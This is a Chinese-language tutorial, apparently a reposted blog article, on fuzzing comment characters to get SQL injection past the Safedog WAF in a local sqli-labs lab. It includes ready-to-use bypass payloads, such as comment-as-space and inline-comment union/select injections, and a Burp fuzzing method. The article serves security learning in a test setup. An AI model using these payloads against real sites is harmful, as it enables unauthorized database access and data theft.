从SQL注入绕过最新安全狗WAF中学习fuzz
2022-9-27 00:1:12 Author: 橘猫学安全(查看原文) 阅读量:45 收藏

其实SQL注入并不是很精通,通过实战绕过WAF来进行加强SQL注入能力,希望对正在学习的师傅能有一丝帮助。

安装前言

我是本地搭建的环境进行测试的

环境是windows11+phpstudy2018+sqli-labs

phpstudy的安装我不再复述,这里简单说一下安全狗插件和安全狗的安装。

过程

在安装安全狗之前,一定要先做好安装apache2.4这一项,否则可能要浪费半个下午的时间来整(受害者本人自述了属于是),因为在提前安装好这个后,再安装安全狗,就会出现如下图所示的情况,这时候就很容易进行配置了

而如果你后安装apache2.4,出现Apache插件安装失败的可能性极大,那我们要怎么安装apache2.4呢,很简单,首先找到你apache下的bin路径,我的是"D:\phpStudy\PHPTutorial\Apache\bin"然后进入cmd中(以管理员身份运行)

C:\Windows\system32>d:D:\>cd D:\phpStudy\PHPTutorial\Apache\binD:\phpStudy\PHPTutorial\Apache\bin> httpd -k install -n apache2.4//安装插件

此时插件的安装就完成了,直接去官网找Apache版本的安全狗

下载到本地即可,此时进行安装(不要开启phpstudy),此时选择好安装路径后就会出现配置界面,它安装过插件的话一般是会自动检测的

此时直接点击确定就好了,然后打开就会发现插件是已安装的

此时看安全狗这个网站安全狗与防护总开关是否都开启,只有都开启了才有效,此时再去打开phpstudy,一般他就应该是自己变成系统服务了,如果没变的话就再选择一下即可

然后此时的话这个防护网站变成1个就说明配置好了

去访问网站就可以发现安全狗生效了

方法一

首先这里的话是尝试一个1=1,发现是不可以的

更换成true=true进行尝试

仍然不行,此时发现当and和后面没有空格的时候就会报错

我们这里尝试用/*/来充当注释符

发现还是被过滤了,此时我们就利用bp来进行fuzz,抓包后在/*/中添加变量(为爆破做准备)

选择暴力破解,字符集就选/!*进行测试即可

得到结果

发现很多都可以充当空格来进行绕过,我们随意挑选一个进行尝试,构造payload如下

id=1' and/*////*/1 --+

成功绕过

方法二

当然常见的还有一个内联注释符,就是/*!00000*/这种的,用实例来解释是最好理解的

mysql> select @@version;+-----------+| @@version |+-----------+| 5.5.53 |+-----------+1 row in set (0.00 sec)mysql> select /*!999991*/;ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1mysql> select /*!000001*/;+---+| 1 |+---+| 1 |+---+1 row in set (0.00 sec)mysql> select /*!1*/;+---+| 1 |+---+| 1 |+---+1 row in set (0.00 sec)mysql> select /*!505531*/;+---+| 1 |+---+| 1 |+---+1 row in set (0.00 sec)mysql> select /*!505541*/;ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

这种注释在mysql中叫做内联注释,如果没有接版本号时,会直接执行里面内容。

当!后面接数据库版本号时,如果自身版本号(上述例子中的5.5.53)大于等于字符数(例如上述例子中的99999和00000),就会将注释中的内容执行,否则就会当做注释来处理。

那么这里的话,我们就想构造1=1,就可以利用它来进行绕过,我们构造如下/*!000001*/=/*!000001*/语句尝试进行绕过

可以发现成功绕过了

直接利用的话可以发现是不可以的

由1=1的构造思路,我们尝试构造空格来进行绕过,构造payload如下

id=1' order/*////*/by 3 --+

id=1' order/*////*/by 4 --+

成功判断出来了字段数为3

首先的话是想利用内联注释来进行一个绕过,因为单独的一个union和单独的select都是可以的,此时我就想利用它内联注释字符数大于版本号时将其内语句作为注释来进行一个绕过,
测试过程如下

选择暴力破解,设置0-9依次进行爆破

而后得到结果

发现这种利用垃圾字符的内联注释方式无法再次绕过,此时我们去尝试进行其他方法,想到之前的fuzz/**/中间加东西可以绕过,不妨试一下这种,设置如下

选择暴力破解,将字符集进行更换即可

得到结果

发现有很多可以绕过的,随便选一个来进行测试,构造payload如下

id=-1' union/*/!*!**/select 1,2,3--+

可以发现正常执行了,说明绕过了,这里再给出几个payload,师傅们可以自行测试

id=-1' union/*//--**/select 1,2,3--+id=-1' union/*/!--**/select 1,2,3--+id=-1' union/*/-*!!*/select 1,2,3--+

方法一(/**/方法)

方法二(/*!*/内联注释法)

like["%23"]

如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell
「 超详细 | 分享 」手把手教你如何进行内网渗透
神兵利器 | siusiu-渗透工具管理套件
一款功能全面的XSS扫描器
实战 | 一次利用哥斯拉马绕过宝塔waf
BurpCrypto: 万能网站密码爆破测试工具
快速筛选真实IP并整理为C段 -- 棱眼
自动探测端口顺便爆破工具t14m4t
渗透工具|无状态子域名爆破工具(1秒扫160万个子域)
查看更多精彩内容,还请关注橘猫学安全:
看到这里了,点个“赞”、“再看”吧

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247499020&idx=2&sn=b668e7851383fd136789c56cf0d5366a&chksm=c04d7a32f73af32467828ee292563f76184fe9395d74c81bcbabf04a7d5f7c5fcb76fbf333f1#rd
如有侵权请联系:admin#unsafe.sh